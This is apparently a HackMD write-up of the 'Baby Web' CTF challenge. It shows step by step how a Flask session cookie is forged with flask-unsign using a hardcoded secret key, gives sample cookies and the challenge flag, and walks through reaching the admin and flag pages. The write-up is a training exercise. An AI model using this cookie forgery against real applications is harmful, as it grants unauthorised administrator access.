Baby Web - HackMD

# Baby Web ### Challenge Details > Author: Junhua \ Category: Web \ Title: Baby Web \ Description: I just learnt how to design my favourite `flask` webpage using `htmx` and `bootstrap`. I hope I don't accidentally expose my super secret flag. \ Points at the end of CTF: 100 \ Instance: http://challs.nusgreyhats.org:33338/ \ Download: https://ctfd.nusgreyhats.org/files/c740b51c8a401dd644fb337268cf3867/dist-baby-web.zip ---- ### TLDR Execute the following commands in order: ```sh pip install flask-unsign flask-unsign -s -c "{'is_admin': True}" -S baby-web ``` Copy cookie outputted from previous command into the session cookie using Chrome devtools. Reload http://challs.nusgreyhats.org:33338/admin Check source code, see that a redirect to http://challs.nusgreyhats.org:33338/flag Go to said link, get flag. ---- ### Writeup As indicated by the title, this challenge is pretty easy, even a toddler could solve it (which is probably why it was one of the only challs i could solve). First of all, `wget` the download link, and open the instance in a new tab with chrome devtools on it. Inspecting the source code, a few things stand out: 1. Line 5: ```py app.secret_key = "baby-web" ``` 2. Lines 17 to 20: ```py @app.route("/admin") def admin(): # Check if the user is admin through cookies return render_template("admin.html", flag=FLAG, is_admin=session.get("is_admin")) ``` Particularly, ```py is_admin=session.get("is_admin") ``` 3. The use of Flask sessions, known for being extremely insecure. Ah, a classic Flask cookie challenge. In a flask session cookie, the first part before the period seperator can be base64 decoded to get some data. However, to generate a cookie from data, you need the "super secret key" to sign the data. Well, I was in luck this time, no bruteforcing required. Refer to the first key (pun not intended) thing I noted: `app.secret_key = "baby-web"`. So now we have to find out what algorithm is used to sign... Wait, I almost forgot, we're programmers. In other words, lazy people. There's already a tool to do that for us, called `flask-unsign`. Execute in a terminal `pip install flask-unsign` if you haven't installed it already. Afterwards, get the session cookie from your instance tab using chrome devtools, for me it was: `eyJpc19hZG1pbiI6ZmFsc2V9.Zi6Dww.k_8s7jUrZn-Gn17kVygRmlBC07k` Try doing `flask-unsign -d -c eyJpc19hZG1pbiI6ZmFsc2V9.Zi6Dww.k_8s7jUrZn-Gn17kVygRmlBC07k`. The flags `-d` and `-c` here tells the tool to **d**ecode the **c**ookie which follows the `-c` flag. You should get `{'is_admin': False}` as the output. All we have to do is change the False value of the boolean to True and create a cookie off it. To do that, execute `flask-unsign -s -c "{'is_admin': True}" -S baby-web`, where the flag `-s`, `-c`, and `-S` mean to **s**ign a **c**ookie with value "{'is_admin': True}" using the **S**ecret key "baby-web". Doing that should give `eyJpc19hZG1pbiI6dHJ1ZX0.Zi6Nyg.xY-dzypVfkGoUokUgG8fW3RLSIk` Now, put that replace the current session cookie with our new cookie and refresh the page at http://challs.nusgreyhats.org:33338/admin. The previously restricted page should now show "This website is still under construction. I have completed the admin page where only I can access. Too bad my secret is not so easily given away". Darn! They know us too well. Or do they? Open Chrome devtools on the page again and inspect the html code. ```html <div class="modal-body"> Wow!, you found the super secret admin button. <br /> <button hx-get="/flag" hx-swap="outerHTML" class="btn btn-secondary"> Here is an even more secret button. </button> ``` They want us to find a secret button. No clue how to do that but we can see that that very well-veiled button has a not-so-veiled redirect to http://challs.nusgreyhats.org:33338/flag. Visit that page and you get: > Here is your flag: \ grey{0h_n0_mY_5up3r_53cr3t_4dm1n_fl4g} ---- ### Comments Pretty fun challenge. Although, I didn't solve it on the CTF day itself (I was away from my computer during that time and could only solve challenges through my phone), I managed to get it once I got back and seriously attempted some of the challenges. \ \ Writeup authored by a very bad amateur ctf player who goes under the alias "quetz".